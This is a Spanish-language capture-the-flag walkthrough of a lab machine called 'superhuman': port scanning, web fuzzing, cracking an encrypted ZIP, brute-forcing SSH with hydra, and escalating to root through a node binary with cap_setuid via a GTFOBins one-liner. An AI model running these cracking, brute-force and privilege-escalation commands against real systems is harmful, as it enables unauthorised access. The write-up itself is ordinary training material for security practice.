Comenzamos con la enumeración de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.21
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.21
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-29 15:34 -03
Nmap scan report for 192.168.1.21
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)
| 256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)
|_ 256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.63 secondsEl código del index.html tiene una pista:
<!-- If your eye was sharper, you would see everything in motion, lol -->Enumeramos exhaustivamente con gobuster:
❯ gobuster dir -u 'http://192.168.1.21' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html,jpg,jpeg,gif,png -r
...
/index.html (Status: 200) [Size: 658]
/notes-tips.txt (Status: 200) [Size: 358]
/nietzsche.jpg (Status: 200) [Size: 22211]
...notes-tips.txt contiene un mensaje cifrado que identificamos como ASCII85 y decodificamos:
F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c
salome doesn't want me, I'm so sad... i'm sure god is dead...
I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.
I must not forget to save it and put a good extension because I don't have much storage.El mensaje sugiere un archivo salome_and_me con una extensión que ahorre espacio. Fuzzeamos extensiones y damos con un .zip:
❯ ffuf -u 'http://192.168.1.21/salome_and_me.FUZZ' -w ~/Documentos/wordlists/SecLists/Fuzzing/extensions-most-common.fuzz.txt
...
zip [Status: 200, Size: 452, Words: 4, Lines: 1, Duration: 13ms]
...El ZIP está cifrado; crackeamos con john:
❯ /opt/john/run/zip2john salome_and_me.zip > hash
ver 2.0 efh 5455 efh 7875 salome_and_me.zip/salome_and_me.txt PKZIP Encr: TS_chk, cmplen=252, decmplen=443, crc=91CF0992 ts=393B cs=393b type=8
❯ /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
turtle (salome_and_me.zip/salome_and_me.txt)
...Dentro hay un poema:
❯ cat salome_and_me.txt
----------------------------------------------------
GREAT POEM FOR SALOME
----------------------------------------------------
My name is fred,
And tonight I'm sad, lonely and scared,
Because my love Salome prefers schopenhauer, asshole,
I hate him he's stupid, ugly and a peephole,
My darling I offered you a great switch,
And now you reject my love, bitch
I don't give a fuck, I'll go with another lady,
And she'll call me BABY!Convertimos el poema en un wordlist y hacemos fuerza bruta contra SSH para el usuario fred:
❯ cat salome_and_me.txt | tr ' ' "\n" | tr '[:upper:]' '[:lower:]' > wordlist.txt
❯ hydra -l fred -P wordlist.txt 192.168.1.21 ssh -t 64
...
[22][ssh] host: 192.168.1.21 login: fred password: schopenhauer
...Al entrar, el comando ls está trampeado para cerrar la conexión, así que usamos dir/cat para movernos y obtenemos la flag:
fred@superhuman:/$ cat /usr/bin/ls
echo "lol"
kill -9 "$(ps --pid $$ -oppid=)"Para escalar, listamos las capabilities (Linux Capabilities Privesc):
fred@superhuman:/$ /usr/sbin/getcap -r / 2>/dev/null
...
/usr/bin/node = cap_setuid+ep
...node tiene cap_setuid, que aprovechamos (GTFOBins) para escalar a root:
fred@superhuman:/$ /usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})'
root@superhuman:/#Obtenemos nuestra flag.
Fin.